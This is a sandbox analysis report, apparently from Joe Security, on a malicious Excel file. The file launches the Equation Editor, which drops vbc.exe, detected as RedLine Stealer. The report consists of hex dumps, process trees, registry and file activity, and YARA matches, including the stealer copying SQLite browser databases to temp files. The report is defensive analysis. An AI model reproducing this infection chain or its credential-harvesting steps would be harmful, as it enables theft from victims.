2022-02-22 14:30:32 UTC 160 IN Data Raw: 4d 75 6c 74 69 63 61 73 74 44 65 6c 65 67 61 74 65 00 43 6f 64 65 50 61 67 65 49 73 55 6e 6b 6e 6f 77 6e 53 75 72 72 6f 67 61 74 65 00 55 6e 6b 6e 6f 77 6e 48 6f 73 74 43 61 6e 47 65 6e 65 72 61 74 65 00 44 65 6c 65 67 61 74 65 41 73 79 6e 63 53 74 61 74 65 00 45 64 69 74 6f 72 42 72 6f 77 73 61 62 6c 65 53 74 61 74 65 00 44 69 67 69 74 53 75 62 73 74 69 74 75 74 69 6f 6e 67 65 74 41 73 73 65 6d 62 6c 79 49 73 50 72 69 76 61 74 65 00 53 74 72 69 6e 67 54 6f 48 47 6c 6f 62 61 6c 55 6e 69 56 6f 6c 61 74 69 6c 65 57 72 69 74 65 00 58 41 74 74 72 69 62 75 74 65 00 43 6f 6d 70 69 6c 65 72 47 65 6e 65 72 61 74 65 64 41 74 74 72 69 62 75 74 65 00 47 75 69 64 41 74 74 72 69 62 75 74 65 00 48 65 6c 70 4b 65 79 77 6f 72 64 41 74 74 72 69 62 75 74 65 00 47 65 6e 65 Data Ascii: MulticastDelegateCodePageIsUnknownSurrogateUnknownHostCanGenerateDelegateAsyncStateEditorBrowsableStateDigitSubstitutiongetAssemblyIsPrivateStringToHGlobalUniVolatileWriteXAttributeCompilerGeneratedAttributeGuidAttributeHelpKeywordAttributeGene

2022-02-22 14:30:32 UTC 164 IN Data Raw: 69 6f 6e 00 53 79 73 74 65 6d 2e 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 00 41 64 64 41 6e 6e 6f 74 61 74 69 6f 6e 00 41 70 70 65 6e 64 41 6c 6c 4c 69 6e 65 73 54 6f 6b 65 6e 45 6c 65 76 61 74 69 6f 6e 00 53 79 73 74 65 6d 2e 47 6c 6f 62 61 6c 69 7a 61 74 69 6f 6e 00 43 75 72 72 65 6e 74 54 68 72 65 61 64 73 65 74 53 6f 61 70 41 63 74 69 6f 6e 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 00 50 72 6f 63 65 73 73 4d 6f 64 75 6c 65 43 6f 6c 6c 65 63 74 69 6f 6e 00 43 6c 65 61 6e 55 70 4d 61 6e 61 67 65 64 44 61 74 61 4e 6f 64 65 4b 65 79 56 61 6c 75 65 43 6f 6c 6c 65 63 74 69 6f 6e 00 47 65 6e 65 72 61 74 65 52 65 66 65 72 65 6e 63 65 4b 65 79 43 6f 6c 6c 65 63 74 69 6f 6e 00 44 6f 4e 6f 74 41 64 64 72 4f 66 43 73 70 50 61 72 65 6e 74 57 69 6e 64 6f Data Ascii: ionSystem.ConfigurationAddAnnotationAppendAllLinesTokenElevationSystem.GlobalizationCurrentThreadsetSoapActionSystem.ReflectionProcessModuleCollectionCleanUpManagedDataNodeKeyValueCollectionGenerateReferenceKeyCollectionDoNotAddrOfCspParentWindo

2022-02-22 14:30:32 UTC 168 IN Data Raw: 4f 70 65 72 61 74 6f 72 73 00 47 65 74 43 75 72 72 65 6e 74 50 72 6f 63 65 73 73 00 70 72 6f 63 65 73 73 00 67 65 74 50 61 79 6c 6f 61 64 4e 61 6d 65 73 61 64 64 43 61 6e 63 65 6c 4b 65 79 50 72 65 73 73 00 67 65 74 5f 42 61 73 65 41 64 64 72 65 73 73 00 61 64 64 72 65 73 73 00 44 61 79 6c 69 67 68 74 44 65 6c 74 61 67 65 74 44 69 73 61 6c 6c 6f 77 42 69 6e 64 69 6e 67 52 65 64 69 72 65 63 74 73 00 43 6f 6e 74 61 69 6e 73 4e 6f 6e 43 6f 64 65 41 63 63 65 73 73 50 65 72 6d 69 73 73 69 6f 6e 73 67 65 74 4e 61 6d 65 64 50 65 72 6d 69 73 73 69 6f 6e 53 65 74 73 00 49 53 4f 43 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 47 65 74 4f 62 6a 65 63 74 73 46 6f 72 4e 61 74 69 76 65 56 61 72 69 61 6e 74 73 00 42 67 65 74 44 65 63 6c 61 72 65 64 45 76 65 6e 74 73 00 67 65 Data Ascii: OperatorsGetCurrentProcessprocessgetPayloadNamesaddCancelKeyPressget_BaseAddressaddressDaylightDeltagetDisallowBindingRedirectsContainsNonCodeAccessPermissionsgetNamedPermissionSetsISOCurrencySymbolGetObjectsForNativeVariantsBgetDeclaredEventsge

2022-02-22 14:30:32 UTC 172 IN Data Raw: 0f 05 08 08 12 00 03 12 20 1d 0e 1d 12 80 8d 15 12 80 95 01 12 80 89 0d 00 02 15 12 80 9d 02 12 71 12 71 1c 18 09 15 12 80 9d 02 12 71 12 71 17 00 02 15 12 6d 01 12 71 15 12 6d 01 12 71 15 12 80 9d 02 12 71 12 71 0a 00 01 15 12 6d 01 1c 12 80 99 0b 00 02 15 12 80 9d 02 1c 1c 1c 18 05 15 12 6d 01 1c 07 15 12 80 9d 02 1c 1c 13 00 02 15 12 6d 01 1c 15 12 6d 01 1c 15 12 80 9d 02 1c 1c 26 07 14 05 1d 1c 08 08 08 1d 04 45 1d 08 1d 1c 08 1d 0a 1d 08 1d 05 0f 05 0f 05 45 1d 0a 08 0f 05 08 45 1d 04 1d 08 07 00 01 12 80 89 12 71 08 00 01 12 80 89 12 80 89 06 00 01 02 12 80 89 08 00 01 12 80 8d 12 80 91 08 00 01 12 80 85 12 80 89 06 00 01 0e 12 80 85 05 00 02 02 0e 0e 09 00 02 02 12 80 8d 12 80 8d 06 00 01 01 12 80 89 0b 00 01 08 15 12 80 95 01 12 80 89 0e 00 02 12 Data Ascii: qqqqmqmqqqmmmm&EEEq

2022-02-22 14:30:32 UTC 176 IN Data Raw: 00 6f 00 73 00 69 00 74 00 69 00 6f 00 6e 00 53 00 61 00 6d 00 70 00 6c 00 65 00 73 00 2e 00 64 00 6c 00 6c 00 00 00 48 00 12 00 01 00 4c 00 65 00 67 00 61 00 6c 00 43 00 6f 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6f 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 a9 00 20 00 20 00 32 00 30 00 32 00 32 00 00 00 64 00 1e 00 01 00 4f 00 72 00 69 00 67 00 69 00 6e 00 61 00 6c 00 46 00 69 00 6c 00 65 00 6e 00 61 00 6d 00 65 00 00 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 43 00 6f 00 6d 00 70 00 6f 00 73 00 69 00 74 00 69 00 6f 00 6e 00 53 00 61 00 6d 00 70 00 6c 00 65 00 73 00 2e 00 64 00 6c 00 6c 00 00 00 54 00 1a 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 4e 00 61 00 6d 00 65 00 00 00 00 00 57 00 69 00 6e 00 64 00 6f 00 77 00 Data Ascii: ositionSamples.dllHLegalCopyrightCopyright 2022dOriginalFilenameWindowsCompositionSamples.dllTProductNameWindow

2022-02-22 14:30:32 UTC 180 IN Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:

2022-02-22 14:30:32 UTC 184 IN Data Raw: ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff 42 42 42 ff 42 42 42 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff 42 42 42 ff 42 42 42 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 fff1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff 42 42 42 ff 42 42 42 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff 42 42 42 ff 42 42 42 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef Data Ascii: BBBBBBBBBBBBBBBBBBBBBBBB


Direction Data


• EXCEL.EXE

• EQNEDT32.EXE

• vbc.exe

• vbc.exe

Click to jump to process

Target ID: 0


Start date: 22/02/2022

Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Wow64 process (32bit): false

Commandline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding

Imagebase: 0x13f5c0000

File size: 28253536 bytes

MD5 hash: D53B85E21886D2AF9815C377537BCAC3

Has elevated privileges: true

Has administrator privileges:

true

Programmed in: C, C++ or other language

Reputation: high

Key Path Completion Count Source Address Symbol

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems success or wait 1 6DDF0648 unknown

Key Path Name Type Data Completion Count Source Address Symbol

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

+3- binary 2B 33 2D 00 14 0A 00 00 02 00 00 00 00 00 00 00 46 00 00 00 01 00 00 00 22 00 00 00 18 00 00 00 70 00 6F 00 61 00 74 00 32 00 30 00 37 00 36 00 34 00 35 00 32 00 2E 00 78 00 6C 00 73 00 78 00 00 00 70 00 6F 00 61 00 74 00 32 00 30 00 37 00 36 00 34 00 35 00 32 00 00 00

success or wait 1 6DDF0648 unknown

Statistics

Behavior

System Behavior

Analysis Process: EXCEL.EXE PID: 2580, Parent PID: 596

General

File Activities

Registry Activities

Key Created

Key Value Created


Key Path Name Type Old Data New Data Completion CountSourceAddress

Symbol

Target ID: 2



Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Wow64 process (32bit): true

Commandline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Imagebase: 0x400000


MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8



true

Programmed in: C, C++ or other language

Reputation: high

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

File Path Access Attributes Options Completion Count Source Address Symbol

File Path Offset Length Value Ascii Completion Count Source Address Symbol

File Path Offset Length Completion Count Source Address Symbol


HKEY_CURRENT_USER\Software\Microsoft\Equation Editor success or wait 1 41369F RegCreateKeyExA

HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0 success or wait 1 41369F RegCreateKeyExA

HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options success or wait 1 41369F RegCreateKeyExA


Symbol

Target ID: 4



Path: C:\Users\Public\vbc.exe


Commandline: "C:\Users\Public\vbc.exe"

Imagebase: 0xf00000


MD5 hash: 980EC4304344F277D722024ADE08CD01



true

Programmed in: .Net C# or VB.NET

Analysis Process: EQNEDT32.EXE PID: 2664, Parent PID: 596

General

File Activities

Registry Activities

Key Created

Analysis Process: vbc.exe PID: 1828, Parent PID: 2664

General


Yara matches: Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.501429999.0000000003319000.00000004.00000800.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.501429999.0000000003319000.00000004.00000800.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.501468548.0000000003339000.00000004.00000800.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.501468548.0000000003339000.00000004.00000800.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.501539068.0000000003387000.00000004.00000800.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.501539068.0000000003387000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

Antivirus matches: Detection: 7%, ReversingLabs

Reputation: low


C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6D517995 unknown


C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll.aux

unknown 176 success or wait 1 6D42DE2C ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6D51A1A4 ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\fb06ad4bc55b9c3ca68a3f9259d826cd\System.Windows.Forms.ni.dll.aux


C:\Windows\assembly\NativeImages_v4.0.30319_32\System\1be7a15b1f33bf22e4f53aaf45518c77\System.ni.dll.aux


C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\1d52bd4ac5e0a6422058a5d62c9f6d9d\System.Drawing.ni.dll.aux


C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\fe4b221b4109f0c78f57a792500699b5\System.Configuration.ni.dll.aux


C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\eb4cca4f06a15158c3f7e2c56516729b\System.Core.ni.dll.aux


C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\4fbda26d781323081b45526da6e87b35\System.Xml.ni.dll.aux


C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 success or wait 1 6C51B2B3 ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 end of file 1 6C51B2B3 ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\4fc035341c55c61ce51e53d179d1e19d\Microsoft.VisualBasic.ni.dll.aux



HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\vbc_RASAPI32 success or wait 1 6B92AD76 unknown


HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\vbc_RASAPI32

EnableFileTracing

dword 0 success or wait 1 6B92AD76 unknown


EnableConsoleTracing

dword 0 success or wait 1 6B92AD76 unknown


FileTracingMask dword -65536 success or wait 1 6B92AD76 unknown


ConsoleTracingMask

dword -65536 success or wait 1 6B92AD76 unknown


MaxFileSize dword 1048576 success or wait 1 6B92AD76 unknown

File Activities

File Read

Registry Activities

Key Created

Key Value Created



FileDirectory expand unicode %windir%\tracing success or wait 1 6B92AD76 unknown



Symbol

Target ID: 5



Path: C:\Users\Public\vbc.exe


Commandline: C:\Users\Public\vbc.exe

Imagebase: 0xf00000


MD5 hash: 980EC4304344F277D722024ADE08CD01



true

Programmed in: .Net C# or VB.NET

Yara matches: Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.496802166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.496802166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.546999883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.546999883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.497707584.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.497707584.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.497086691.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.497086691.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.547529132.0000000002357000.00000004.00000800.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.497411507.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe SecurityRule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.497411507.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

Reputation: low


C:\Users\user\AppData\Local\Temp\tmp6222.tmp read attributes | synchronize | generic read

device | sparse file

synchronous io non alert | non directory file

success or wait 1 6C517C90 GetTempFileNameW

C:\Users\user\AppData\Local\Temp\tmp62EE.tmp read attributes | synchronize | generic read








C:\Users\user\AppData\Local\Temp\tmp64E3.tmp read attributes | synchronize | generic read




C:\Users\user\AppData\Local\Temp\tmp66A8.tmp read attributes | synchronize | generic read




C:\Users\user\AppData\Local\Temp\tmp67A3.tmp read attributes | synchronize | generic read




Analysis Process: vbc.exe PID: 2844, Parent PID: 1828

General

File Activities

File Created


C:\Users\user\AppData\Local\Temp\tmp6AC0.tmp read attributes | synchronize | generic read




C:\Users\user\AppData\Local\Temp\tmp6C85.tmp read attributes | synchronize | generic read








C:\Users\user\AppData\Local\Temp\tmp71C5.tmp read attributes | synchronize | generic read




C:\Users\user\AppData\Local\Temp\tmp72BF.tmp read attributes | synchronize | generic read




C:\Users\user\AppData\Local\Temp\tmp738B.tmp read attributes | synchronize | generic read












C:\Users\user\AppData\Local\Temp\tmp764C.tmp read attributes | synchronize | generic read












C:\Users\user\AppData\Local\Temp\tmp790D.tmp read attributes | synchronize | generic read




C:\Users\user\AppData\Local\Temp\tmp79D9.tmp read attributes | synchronize | generic read




C:\Users\user\AppData\Local\Temp\tmp7AA5.tmp read attributes | synchronize | generic read




C:\Users\user\AppData\Local\Temp\tmp7BCE.tmp read attributes | synchronize | generic read




C:\Users\user\AppData\Local\Temp\tmp7CF7.tmp read attributes | synchronize | generic read




C:\Users\user\AppData\Local\Temp\tmp533A.tmp read attributes | synchronize | generic read




C:\Users\user\AppData\Local\Temp\tmp3E26.tmp read attributes | synchronize | generic read




C:\Users\user\AppData\Local\Temp\tmp3EE2.tmp read attributes | synchronize | generic read




C:\Users\user\AppData\Local\Temp\tmp3FAE.tmp read attributes | synchronize | generic read




C:\Users\user\AppData\Local\Yandex read data or list directory | synchronize


directory file | synchronous io non alert | open for backup ident | open reparse point

success or wait 1 6C514247 CreateDirectoryW

C:\Users\user\AppData\Local\Yandex\YaAddon read data or list directory | synchronize


directory file | synchronous io non alert | open for backup ident | open reparse point

success or wait 1 6C514247 CreateDirectoryW


File Path Completion Count Source Address Symbol

C:\Users\user\AppData\Local\Temp\tmp62EE.tmp success or wait 1 6C517D79 DeleteFileW

File Deleted


C:\Users\user\AppData\Local\Temp\tmp6222.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp64E3.tmp success or wait 1 6C517D79 DeleteFileW


C:\Users\user\AppData\Local\Temp\tmp67A3.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp66A8.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp6C85.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp6AC0.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp71C5.tmp success or wait 1 6C517D79 DeleteFileW


C:\Users\user\AppData\Local\Temp\tmp738B.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp72BF.tmp success or wait 1 6C517D79 DeleteFileW




C:\Users\user\AppData\Local\Temp\tmp764C.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp790D.tmp success or wait 1 6C517D79 DeleteFileW


C:\Users\user\AppData\Local\Temp\tmp7AA5.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp79D9.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp7CF7.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp7BCE.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp533A.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp3E26.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp3EE2.tmp success or wait 1 6C517D79 DeleteFileW

C:\Users\user\AppData\Local\Temp\tmp3FAE.tmp success or wait 1 6C517D79 DeleteFileW

File Path Completion Count Source Address Symbol



0 40960 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 15 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 2e 43 fd 05 00 00 00 01 07 fd 00 00 00 00 10 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

SQLite format 3@ .C success or wait 1 3E6803 CopyFileW

File Written


C:\Users\user\AppData\Local\Temp\tmp62EE.tmp

0 40960 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 15 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 2e 43 fd 05 00 00 00 01 07 fd 00 00 00 00 10 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00



0 40960 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 15 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 2e 43 fd 05 00 00 00 01 07 fd 00 00 00 00 10 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00





0 40960 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 15 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 2e 43 fd 05 00 00 00 01 07 fd 00 00 00 00 10 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00



0 40960 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 15 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 2e 43 fd 05 00 00 00 01 07 fd 00 00 00 00 10 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00





0 40960 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 15 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 2e 43 fd 05 00 00 00 01 07 fd 00 00 00 00 10 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00


C:\Users\user\AppData\Local\Temp\tmp6AC0.tmp

0 28672 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 10 00 01 01 00 40 20 20 00 00 00 09 00 00 00 07 00 00 00 07 00 00 00 02 00 00 00 0d 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 2e 43 fd 0d 0d 2e 00 04 0c fd 00 0f 67 0f fd 0d 4e 0c fd 0c fd 0c fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

SQLite format 3@ .C.gN success or wait 1 3E6803 CopyFileW




